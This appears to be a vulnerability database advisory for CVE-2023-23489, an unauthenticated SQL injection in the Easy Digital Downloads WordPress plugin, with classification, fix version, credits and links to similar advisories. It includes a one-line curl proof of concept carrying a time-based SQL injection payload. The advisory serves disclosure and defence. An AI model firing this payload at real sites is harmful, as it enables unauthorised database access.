Easy Digital Downloads 3.1.0.2 & 3.1.0.3 – Unauthenticated SQLi | CVE 2023-23489

Description

The plugin does not properly sanitise and escape the s parameter before using it in a SQL statement via the edd_download_search AJAX action , leading to a SQL injection exploitable by unauthenticated users

Proof of Concept

curl "https://example.com/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"

Affects Plugins

easy-digital-downloads

Fixed in 3.1.0.4

References

CVE

CVE-2023-23489

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable)

Verified

WPVDB ID

c5a6830c-6420-42fc-b20c-8e20224d6f18

Timeline

Publicly Published

2023-01-12 (about 2 years ago)

Added

2023-01-20 (about 2 years ago)

Last Updated

2023-01-20 (about 2 years ago)

Other

Published

Title

Published

2024-08-22

Title

TI WooCommerce Wishlist < 2.9.0 - Unauthenticated SQL Injection

Published

2025-10-02

Title

WPRecovery <= 2.0 - Unauthenticated SQL Injection to Arbitrary File Deletion

Published

2025-07-14

Title

CoSchool LMS <= 1.4.3 - Authenticated (Subscriber+) SQL Injection

Published

2015-10-09

Title

Limit Attempts < 1.1.1 - SQL Injection

Published

2025-03-27

Title

Lead Form Data Collection to CRM < 3.1 - Authenticated (Contributor+) SQL Injection